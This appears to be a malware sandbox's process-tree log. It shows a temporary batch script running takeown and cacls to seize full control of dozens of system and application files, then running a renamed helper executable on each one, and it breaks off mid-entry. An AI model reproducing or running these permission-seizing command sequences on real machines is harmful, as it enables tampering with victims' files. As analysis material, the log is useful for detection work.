depth 2 | PID 5648 | C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\DLp1Amrl.bat" "C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdateSetup.exe""
  depth 3 | PID 5560 | C:\Windows\SysWOW64\cacls.exe | cacls "C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdateSetup.exe" /E /G Admin:F /C
  depth 3 | PID 5540 | C:\Windows\SysWOW64\takeown.exe | takeown /F "C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdateSetup.exe" | signatures: Modifies file permissions
  depth 3 | PID 5744 | C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c UxaXqOSf.exe -accepteula "GoogleUpdateSetup.exe" -nobanner
    depth 4 | PID 5764 | C:\Users\Admin\AppData\Local\Temp\UxaXqOSf.exe | UxaXqOSf.exe -accepteula "GoogleUpdateSetup.exe" -nobanner
  depth 3 | PID 5804 | C:\Users\Admin\AppData\Local\Temp\UxaXqOSf.exe | UxaXqOSf.exe -accepteula -c Run -y -p extract -nobanner

depth 2 | PID 5820 | C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\DLp1Amrl.bat" "C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\Workflow.VisualBasic.Targets""
  depth 3 | PID 5692 | C:\Windows\SysWOW64\cacls.exe | cacls "C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\Workflow.VisualBasic.Targets" /E /G Admin:F /C
  depth 3 | PID 5892 | C:\Windows\SysWOW64\takeown.exe | takeown /F "C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\Workflow.VisualBasic.Targets" | signatures: Modifies file permissions
  depth 3 | PID 5904 | C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c UxaXqOSf.exe -accepteula "Workflow.VisualBasic.Targets" -nobanner
    depth 4 | PID 5956 | C:\Users\Admin\AppData\Local\Temp\UxaXqOSf.exe | UxaXqOSf.exe -accepteula "Workflow.VisualBasic.Targets" -nobanner
  depth 3 | PID 5972 | C:\Users\Admin\AppData\Local\Temp\UxaXqOSf.exe | UxaXqOSf.exe -accepteula -c Run -y -p extract -nobanner

depth 2 | PID 5872 | C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\DLp1Amrl.bat" "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\TempState\TileCache_100_0_Header.bin""
  depth 3 | PID 6036 | C:\Windows\SysWOW64\cacls.exe | cacls "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\TempState\TileCache_100_0_Header.bin" /E /G Admin:F /C
  depth 3 | PID 6080 | C:\Windows\SysWOW64\takeown.exe | takeown /F "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\TempState\TileCache_100_0_Header.bin" | signatures: Modifies file permissions
  depth 3 | PID 6104 | C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c UxaXqOSf.exe -accepteula "TileCache_100_0_Header.bin" -nobanner
    depth 4 | PID 6124 | C:\Users\Admin\AppData\Local\Temp\UxaXqOSf.exe | UxaXqOSf.exe -accepteula "TileCache_100_0_Header.bin" -nobanner
  depth 3 | PID 6016 | C:\Users\Admin\AppData\Local\Temp\UxaXqOSf.exe | UxaXqOSf.exe -accepteula -c Run -y -p extract -nobanner

depth 2 | PID 5996 | C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\DLp1Amrl.bat" "C:\Program Files (x86)\Windows Mail\WinMail.exe""
  depth 3 | PID 4200 | C:\Windows\SysWOW64\cacls.exe | cacls "C:\Program Files (x86)\Windows Mail\WinMail.exe" /E /G Admin:F /C
  depth 3 | PID 4900 | C:\Windows\SysWOW64\takeown.exe | takeown /F "C:\Program Files (x86)\Windows Mail\WinMail.exe" | signatures: Modifies file permissions
  depth 3 | PID 5276 | C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c UxaXqOSf.exe -accepteula "WinMail.exe" -nobanner
    depth 4 | PID 5148 | C:\Users\Admin\AppData\Local\Temp\UxaXqOSf.exe | UxaXqOSf.exe -accepteula "WinMail.exe" -nobanner
  depth 3 | PID 5128 | C:\Users\Admin\AppData\Local\Temp\UxaXqOSf.exe | UxaXqOSf.exe -accepteula -c Run -y -p extract -nobanner

depth 2 | PID 5356 | C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\DLp1Amrl.bat" "C:\Users\All Users\Microsoft\AppV\Setup\OfficeIntegrator.ps1""
  depth 3 | PID 5252 | C:\Windows\SysWOW64\cacls.exe | cacls "C:\Users\All Users\Microsoft\AppV\Setup\OfficeIntegrator.ps1" /E /G Admin:F /C
  depth 3 | PID 5428 | C:\Windows\SysWOW64\takeown.exe | takeown /F "C:\Users\All Users\Microsoft\AppV\Setup\OfficeIntegrator.ps1" | signatures: Modifies file permissions
  depth 3 | PID 5300 | C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c UxaXqOSf.exe -accepteula "OfficeIntegrator.ps1" -nobanner
    depth 4 | PID 5296 | C:\Users\Admin\AppData\Local\Temp\UxaXqOSf.exe | UxaXqOSf.exe -accepteula "OfficeIntegrator.ps1" -nobanner
  depth 3 | PID 5500 | C:\Users\Admin\AppData\Local\Temp\UxaXqOSf.exe | UxaXqOSf.exe -accepteula -c Run -y -p extract -nobanner

depth 2 | PID 5580 | C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\DLp1Amrl.bat" "C:\Users\All Users\Microsoft\Diagnosis\DownloadedSettings\utc.app.json""
  depth 3 | PID 5468 | C:\Windows\SysWOW64\cacls.exe | cacls "C:\Users\All Users\Microsoft\Diagnosis\DownloadedSettings\utc.app.json" /E /G Admin:F /C
  depth 3 | PID 5476 | C:\Windows\SysWOW64\takeown.exe | takeown /F "C:\Users\All Users\Microsoft\Diagnosis\DownloadedSettings\utc.app.json" | signatures: Modifies file permissions
  depth 3 | PID 5616 | C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c UxaXqOSf.exe -accepteula "utc.app.json" -nobanner
    depth 4 | PID 5552 | C:\Users\Admin\AppData\Local\Temp\UxaXqOSf.exe | UxaXqOSf.exe -accepteula "utc.app.json" -nobanner
  depth 3 | PID 5752 | C:\Users\Admin\AppData\Local\Temp\UxaXqOSf.exe | UxaXqOSf.exe -accepteula -c Run -y -p extract -nobanner

depth 2 | PID 5740 | C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\DLp1Amrl.bat" "C:\Users\All Users\Microsoft\UEV\Templates\SettingsLocationTemplate.xsd""
  depth 3 | PID 5660 | C:\Windows\SysWOW64\cacls.exe | cacls "C:\Users\All Users\Microsoft\UEV\Templates\SettingsLocationTemplate.xsd" /E /G Admin:F /C
  depth 3 | PID 5848 | C:\Windows\SysWOW64\takeown.exe | takeown /F "C:\Users\All Users\Microsoft\UEV\Templates\SettingsLocationTemplate.xsd" | signatures: Modifies file permissions
  depth 3 | PID 5912 | C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c UxaXqOSf.exe -accepteula "SettingsLocationTemplate.xsd" -nobanner
    depth 4 | PID 5940 | C:\Users\Admin\AppData\Local\Temp\UxaXqOSf.exe | UxaXqOSf.exe -accepteula "SettingsLocationTemplate.xsd" -nobanner
  depth 3 | PID 5928 | C:\Users\Admin\AppData\Local\Temp\UxaXqOSf.exe | UxaXqOSf.exe -accepteula -c Run -y -p extract -nobanner

depth 2 | PID 5700 | C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\DLp1Amrl.bat" "C:\Users\All Users\Microsoft\Diagnosis\DownloadedSettings\telemetry.ASM-WindowsDefault.json""
  depth 3 | PID 6060 | C:\Windows\SysWOW64\cacls.exe | cacls "C:\Users\All Users\Microsoft\Diagnosis\DownloadedSettings\telemetry.ASM-WindowsDefault.json" /E /G Admin:F /C
  depth 3 | PID 6096 | C:\Windows\SysWOW64\takeown.exe | takeown /F "C:\Users\All Users\Microsoft\Diagnosis\DownloadedSettings\telemetry.ASM-WindowsDefault.json" | signatures: Modifies file permissions
  depth 3 | PID 6012 | C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c UxaXqOSf.exe -accepteula "telemetry.ASM-WindowsDefault.json" -nobanner
    depth 4 | PID 6084 | C:\Users\Admin\AppData\Local\Temp\UxaXqOSf.exe | UxaXqOSf.exe -accepteula "telemetry.ASM-WindowsDefault.json" -nobanner
  depth 3 | PID 5992 | C:\Users\Admin\AppData\Local\Temp\UxaXqOSf.exe | UxaXqOSf.exe -accepteula -c Run -y -p extract -nobanner

depth 2 | PID 6040 | C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\DLp1Amrl.bat" "C:\Users\All Users\Microsoft\Storage Health\StorageHealthModel.dat""
  depth 3 | PID 5280 | C:\Windows\SysWOW64\cacls.exe | cacls "C:\Users\All Users\Microsoft\Storage Health\StorageHealthModel.dat" /E /G Admin:F /C
  depth 3 | PID 5136 | C:\Windows\SysWOW64\takeown.exe | takeown /F "C:\Users\All Users\Microsoft\Storage Health\StorageHealthModel.dat" | signatures: Modifies file permissions
  depth 3 | PID 5360 | C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c UxaXqOSf.exe -accepteula "StorageHealthModel.dat" -nobanner
    depth 4 | PID 5212 | C:\Users\Admin\AppData\Local\Temp\UxaXqOSf.exe | UxaXqOSf.exe -accepteula "StorageHealthModel.dat" -nobanner
  depth 3 | PID 5172 | C:\Users\Admin\AppData\Local\Temp\UxaXqOSf.exe | UxaXqOSf.exe -accepteula -c Run -y -p extract -nobanner

C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\DLp1Amrl.bat" "C:\Users\Admin\AppData\Local\TileDataLayer\Database\vedatamodel.edb""2⤵PID:5420
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\TileDataLayer\Database\vedatamodel.edb" /E /G Admin:F /C3⤵PID:5328
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\TileDataLayer\Database\vedatamodel.edb"3⤵PID:5404
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c UxaXqOSf.exe -accepteula "vedatamodel.edb" -nobanner3⤵PID:496
-
C:\Users\Admin\AppData\Local\Temp\UxaXqOSf.exeUxaXqOSf.exe -accepteula "vedatamodel.edb" -nobanner4⤵PID:5236
-
-
-
C:\Users\Admin\AppData\Local\Temp\UxaXqOSf.exeUxaXqOSf.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:5516
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\DLp1Amrl.bat" "C:\Program Files (x86)\Windows Mail\en-US\msoeres.dll.mui""2⤵PID:5556
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Windows Mail\en-US\msoeres.dll.mui" /E /G Admin:F /C3⤵PID:5776
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Windows Mail\en-US\msoeres.dll.mui"3⤵
- Modifies file permissions
PID:5572
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c UxaXqOSf.exe -accepteula "msoeres.dll.mui" -nobanner3⤵PID:5780
-
C:\Users\Admin\AppData\Local\Temp\UxaXqOSf.exeUxaXqOSf.exe -accepteula "msoeres.dll.mui" -nobanner4⤵PID:5828
-
-
-
C:\Users\Admin\AppData\Local\Temp\UxaXqOSf.exeUxaXqOSf.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:5916
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\DLp1Amrl.bat" "C:\Users\All Users\Adobe\Setup\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}\AcroRdrDCUpd1901020069.msp""2⤵PID:5944
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\Adobe\Setup\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}\AcroRdrDCUpd1901020069.msp" /E /G Admin:F /C3⤵PID:5564
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\Adobe\Setup\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}\AcroRdrDCUpd1901020069.msp"3⤵
- Modifies file permissions
PID:5812
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c UxaXqOSf.exe -accepteula "AcroRdrDCUpd1901020069.msp" -nobanner3⤵PID:6076
-
C:\Users\Admin\AppData\Local\Temp\UxaXqOSf.exeUxaXqOSf.exe -accepteula "AcroRdrDCUpd1901020069.msp" -nobanner4⤵PID:6132
-
-
-
C:\Users\Admin\AppData\Local\Temp\UxaXqOSf.exeUxaXqOSf.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:6120
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\DLp1Amrl.bat" "C:\Users\All Users\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\background.png""2⤵PID:6044
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\background.png" /E /G Admin:F /C3⤵PID:6140
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\background.png"3⤵
- Modifies file permissions
PID:5232
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c UxaXqOSf.exe -accepteula "background.png" -nobanner3⤵PID:5200
-
C:\Users\Admin\AppData\Local\Temp\UxaXqOSf.exeUxaXqOSf.exe -accepteula "background.png" -nobanner4⤵PID:5204
-
-
-
C:\Users\Admin\AppData\Local\Temp\UxaXqOSf.exeUxaXqOSf.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:5444
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\DLp1Amrl.bat" "C:\Users\All Users\Microsoft\Diagnosis\ETLLogs\ShutdownLogger\AutoLogger-Diagtrack-Listener.etl""2⤵PID:5100
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\Microsoft\Diagnosis\ETLLogs\ShutdownLogger\AutoLogger-Diagtrack-Listener.etl" /E /G Admin:F /C3⤵PID:5228
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\Microsoft\Diagnosis\ETLLogs\ShutdownLogger\AutoLogger-Diagtrack-Listener.etl"3⤵PID:5608
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c UxaXqOSf.exe -accepteula "AutoLogger-Diagtrack-Listener.etl" -nobanner3⤵PID:5424
-
C:\Users\Admin\AppData\Local\Temp\UxaXqOSf.exeUxaXqOSf.exe -accepteula "AutoLogger-Diagtrack-Listener.etl" -nobanner4⤵PID:5484
-
-
-
C:\Users\Admin\AppData\Local\Temp\UxaXqOSf.exeUxaXqOSf.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:5412
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\DLp1Amrl.bat" "C:\Users\All Users\Microsoft\SmsRouter\MessageStore\edbres00001.jrs""2⤵PID:5532
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\Microsoft\SmsRouter\MessageStore\edbres00001.jrs" /E /G Admin:F /C3⤵PID:5908
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\Microsoft\SmsRouter\MessageStore\edbres00001.jrs"3⤵
- Modifies file permissions
PID:5772
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c UxaXqOSf.exe -accepteula "edbres00001.jrs" -nobanner3⤵PID:5968
-
C:\Users\Admin\AppData\Local\Temp\UxaXqOSf.exeUxaXqOSf.exe -accepteula "edbres00001.jrs" -nobanner4⤵PID:5736
-
-
-
C:\Users\Admin\AppData\Local\Temp\UxaXqOSf.exeUxaXqOSf.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:5732
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\DLp1Amrl.bat" "C:\Users\Admin\AppData\Local\Microsoft\GameDVR\KnownGameList.bin""2⤵PID:5548
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Microsoft\GameDVR\KnownGameList.bin" /E /G Admin:F /C3⤵PID:6008
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Microsoft\GameDVR\KnownGameList.bin"3⤵
- Modifies file permissions
PID:6028
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c UxaXqOSf.exe -accepteula "KnownGameList.bin" -nobanner3⤵PID:5668
-
C:\Users\Admin\AppData\Local\Temp\UxaXqOSf.exeUxaXqOSf.exe -accepteula "KnownGameList.bin" -nobanner4⤵PID:5672
-
-
-
C:\Users\Admin\AppData\Local\Temp\UxaXqOSf.exeUxaXqOSf.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:5140
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\DLp1Amrl.bat" "C:\Users\All Users\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\watermark.png""2⤵PID:5160
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\watermark.png" /E /G Admin:F /C3⤵PID:4280
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\watermark.png"3⤵
- Modifies file permissions
PID:5824
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c UxaXqOSf.exe -accepteula "watermark.png" -nobanner3⤵PID:5868
-
C:\Users\Admin\AppData\Local\Temp\UxaXqOSf.exeUxaXqOSf.exe -accepteula "watermark.png" -nobanner4⤵PID:640
-
-
-
C:\Users\Admin\AppData\Local\Temp\UxaXqOSf.exeUxaXqOSf.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:5460
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\DLp1Amrl.bat" "C:\Users\All Users\Microsoft\Diagnosis\osver.txt""2⤵PID:5504
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\Microsoft\Diagnosis\osver.txt" /E /G Admin:F /C3⤵PID:4132
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\Microsoft\Diagnosis\osver.txt"3⤵
- Modifies file permissions
PID:5640
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c UxaXqOSf.exe -accepteula "osver.txt" -nobanner3⤵PID:5664
-
C:\Users\Admin\AppData\Local\Temp\UxaXqOSf.exeUxaXqOSf.exe -accepteula "osver.txt" -nobanner4⤵PID:5952
-
-
-
C:\Users\Admin\AppData\Local\Temp\UxaXqOSf.exeUxaXqOSf.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:5524
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\DLp1Amrl.bat" "C:\Users\All Users\Microsoft\SmsRouter\MessageStore\edbres00002.jrs""2⤵PID:5964
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\Microsoft\SmsRouter\MessageStore\edbres00002.jrs" /E /G Admin:F /C3⤵PID:6116
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\Microsoft\SmsRouter\MessageStore\edbres00002.jrs"3⤵
- Modifies file permissions
PID:5644
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c UxaXqOSf.exe -accepteula "edbres00002.jrs" -nobanner3⤵PID:5720
-
C:\Users\Admin\AppData\Local\Temp\UxaXqOSf.exeUxaXqOSf.exe -accepteula "edbres00002.jrs" -nobanner4⤵PID:5860
-
-
-
C:\Users\Admin\AppData\Local\Temp\UxaXqOSf.exeUxaXqOSf.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:5124
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\DLp1Amrl.bat" "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\background.png""2⤵PID:3904
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\background.png" /E /G Admin:F /C3⤵PID:6068
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\background.png"3⤵
- Modifies file permissions
PID:5248
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c UxaXqOSf.exe -accepteula "background.png" -nobanner3⤵PID:5480
-
C:\Users\Admin\AppData\Local\Temp\UxaXqOSf.exeUxaXqOSf.exe -accepteula "background.png" -nobanner4⤵PID:5864
-
-
-
C:\Users\Admin\AppData\Local\Temp\UxaXqOSf.exeUxaXqOSf.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:4876
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\DLp1Amrl.bat" "C:\Users\All Users\Microsoft\UEV\Templates\SettingsLocationTemplate2013.xsd""2⤵PID:5536
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\Microsoft\UEV\Templates\SettingsLocationTemplate2013.xsd" /E /G Admin:F /C3⤵PID:5688
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\Microsoft\UEV\Templates\SettingsLocationTemplate2013.xsd"3⤵
- Modifies file permissions
PID:5800
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c UxaXqOSf.exe -accepteula "SettingsLocationTemplate2013.xsd" -nobanner3⤵PID:5372
-
C:\Users\Admin\AppData\Local\Temp\UxaXqOSf.exeUxaXqOSf.exe -accepteula "SettingsLocationTemplate2013.xsd" -nobanner4⤵PID:5316
-
-
-
C:\Users\Admin\AppData\Local\Temp\UxaXqOSf.exeUxaXqOSf.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:6048
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\DLp1Amrl.bat" "C:\Program Files (x86)\Windows Mail\wab.exe""2⤵PID:5788
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Windows Mail\wab.exe" /E /G Admin:F /C3⤵PID:6108
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Windows Mail\wab.exe"3⤵
- Modifies file permissions
PID:5528
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c UxaXqOSf.exe -accepteula "wab.exe" -nobanner3⤵PID:5696
-
C:\Users\Admin\AppData\Local\Temp\UxaXqOSf.exeUxaXqOSf.exe -accepteula "wab.exe" -nobanner4⤵PID:4472
-
-
-
C:\Users\Admin\AppData\Local\Temp\UxaXqOSf.exeUxaXqOSf.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1964
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\DLp1Amrl.bat" "C:\Users\Admin\AppData\Local\TileDataLayer\Database\vedatamodel.jfm""2⤵PID:5268
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\TileDataLayer\Database\vedatamodel.jfm" /E /G Admin:F /C3⤵PID:6024
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\TileDataLayer\Database\vedatamodel.jfm"3⤵
- Modifies file permissions
PID:5220
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c UxaXqOSf.exe -accepteula "vedatamodel.jfm" -nobanner3⤵PID:5756
-
C:\Users\Admin\AppData\Local\Temp\UxaXqOSf.exeUxaXqOSf.exe -accepteula "vedatamodel.jfm" -nobanner4⤵PID:5760
-
-
-
C:\Users\Admin\AppData\Local\Temp\UxaXqOSf.exeUxaXqOSf.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:5332
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\DLp1Amrl.bat" "C:\Users\All Users\Adobe\Setup\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}\Data1.cab""2⤵PID:5836
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\Adobe\Setup\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}\Data1.cab" /E /G Admin:F /C3⤵PID:5312
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\Adobe\Setup\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}\Data1.cab"3⤵
- Modifies file permissions
PID:5888
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c UxaXqOSf.exe -accepteula "Data1.cab" -nobanner3⤵PID:5464
-
C:\Users\Admin\AppData\Local\Temp\UxaXqOSf.exeUxaXqOSf.exe -accepteula "Data1.cab" -nobanner4⤵PID:5348
-
-
-
C:\Users\Admin\AppData\Local\Temp\UxaXqOSf.exeUxaXqOSf.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:4788
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\DLp1Amrl.bat" "C:\Users\All Users\Microsoft\Diagnosis\parse.dat""2⤵PID:5884
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\Microsoft\Diagnosis\parse.dat" /E /G Admin:F /C3⤵PID:5924
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\Microsoft\Diagnosis\parse.dat"3⤵PID:5340
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c UxaXqOSf.exe -accepteula "parse.dat" -nobanner3⤵PID:5816
-
C:\Users\Admin\AppData\Local\Temp\UxaXqOSf.exeUxaXqOSf.exe -accepteula "parse.dat" -nobanner4⤵PID:6000
-
-
-
C:\Users\Admin\AppData\Local\Temp\UxaXqOSf.exeUxaXqOSf.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:5856
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\DLp1Amrl.bat" "C:\Users\All Users\Microsoft\SmsRouter\MessageStore\SmsInterceptStore.jfm""2⤵PID:4792
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\Microsoft\SmsRouter\MessageStore\SmsInterceptStore.jfm" /E /G Admin:F /C3⤵PID:5188
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\Microsoft\SmsRouter\MessageStore\SmsInterceptStore.jfm"3⤵
- Modifies file permissions
PID:4944
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c UxaXqOSf.exe -accepteula "SmsInterceptStore.jfm" -nobanner3⤵PID:5716
-
C:\Users\Admin\AppData\Local\Temp\UxaXqOSf.exeUxaXqOSf.exe -accepteula "SmsInterceptStore.jfm" -nobanner4⤵PID:5844
-
-
-
C:\Users\Admin\AppData\Local\Temp\UxaXqOSf.exeUxaXqOSf.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:5176
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\DLp1Amrl.bat" "C:\Users\All Users\Microsoft\UEV\Scripts\RegisterInboxTemplates.ps1""2⤵PID:5624
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\Microsoft\UEV\Scripts\RegisterInboxTemplates.ps1" /E /G Admin:F /C3⤵PID:5440
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\Microsoft\UEV\Scripts\RegisterInboxTemplates.ps1"3⤵
- Modifies file permissions
PID:5408
-
-
